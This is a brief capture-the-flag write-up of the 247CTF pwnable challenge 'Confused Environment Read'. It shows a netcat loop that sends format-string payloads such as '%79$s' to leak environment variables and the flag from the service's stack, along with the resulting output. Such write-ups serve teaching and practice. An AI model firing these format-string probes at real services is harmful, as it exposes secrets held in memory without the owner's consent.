Confused Environment Read (pwn)

PUBLISHED ON 27/02/2020 — EDITED ON 01/04/2020 — 247CTF, INFOSEC

Intro

This is my write-up of a Pwnable challenge Confused Environment Read on the CTF site 247CTF.com.

Instructions

Can you abuse our confused environment service to read flag data hidden on the stack?

Howto

kali@kali:~$ for i in range $(seq 0 100); do echo "%$i\$s" | nc b7dca240cf1fbf61.247ctf.com 50478; done

Keep breaking up the command with ^C until you hit something interesting on the stack:

/home/notroot/chall

HOSTNAME=b7dca240cf1f!
HOME=/home/notroot
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin!
PWD=/home/notroot!
FLAG=247CTF{FLAG}!

Exact value:

kali@kali:~$ nc b7dca240cf1fbf61.247ctf.com 50478
Argh, I can't see who you are!
What's your name again?
%79$s
Oh, that's right! Welcome back FLAG=247CTF{FLAG}!

See Also

TAGS: 247CTF, CTF, HACK, STACK